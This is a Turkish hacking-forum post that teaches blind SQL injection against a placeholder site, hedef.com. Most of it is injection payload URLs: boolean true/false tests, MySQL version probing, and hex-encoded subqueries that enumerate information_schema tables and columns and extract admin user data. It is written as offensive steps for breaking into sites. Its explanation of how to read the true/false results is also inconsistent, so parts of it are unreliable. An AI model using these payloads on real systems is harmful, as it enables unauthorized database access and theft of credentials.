THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Blind Sql İnjection Güvenlik Zaafiyeti

dreamerr - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
10/2008
Mesajlar:
154
Konular:
83
Teşekkür (Etti):
77
Teşekkür (Aldı):
43
Ticaret:
(0) %
06-01-2016 19:32
#1
Blind Sql İnjection Güvenlik Zaafiyeti
SQL Injection Türleri 2

4) Blind SQL İnjection

Bu SQL türünde açığı ’ yada ’a ile öğrenmiyoruz. Örnek olarak

Sitemiz http://www.hedef.com/index.php?id=7 olsun siteye şu işlemleri uyguluyoruz.

a-) http://www.hedef.com/index.php?id=7 and 1=1– siteye bunu uyguluyoruz. Sitede herhangi bir değişiklik olmaz. Ancak http://www.hedef.com/index.php?id=7 and 1=2– yaptığımızda sitede herhangi bir değişiklik olursa
Blind SQL İnjection açığı vardır. Şimdi mySQL versiyonunu öğrenelim. Onun için şunu kodu uyguluyoruz. http://www.hedef.com/index.php?id=7 and substring(@@version,1,1)=4 URL’deki 4 sayısı mySQL versiyonunu
belirler. Eğer 4’se tablo isimlerini tahmin etmemiz gerekir 5’te ise direk çekeriz. Bu kodu uyguladık diyelim sayfada bozulma olmadı. http://www.hedef.com/index.php?id=7 and substring(@@version,1,1)=5 yazalım,
sayfada bozulma oldu. O zaman mySQL versiyonu 5’tir. Şimdi tablo isimlerini çekelim.

b-) http://www.hedef.com/index.php?id=7 and substring((select table_name from information_schema.tables where table_name like 0x257061737325),1,1)=0x61 kodunu deniyelim.

0x257061737325 pass, 0x61 ise a ’dır. Bunalar hexlenmiş halidir. Neden a derseniz kodu yazıp sayfayı açtığımızda eğer sayfada değişiklik olmazsa sayfada a ile başlayan tablo ismi vardır. Bu admin olabilir. Şimdi admin olarak devam edelim. http://www.hedef.com/index.php?id=7 and substring((select column_name from
information_schema.columns where table_name=0x61646d696e limit 3,1),1,50) like 0x257061737325 kodunu yazıp sayfayı yenileyelim. Diyelim ki sütunları doğru tahmin ettik. Şimdi kolonları tahmin edeceğiz.

http://www.hedef.com/index.php?id=7 and substring((select user from admin),1,1)=0x(tahmin edilen admin kolunu) ancak hex ile tahmin etmeniz gerekir

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler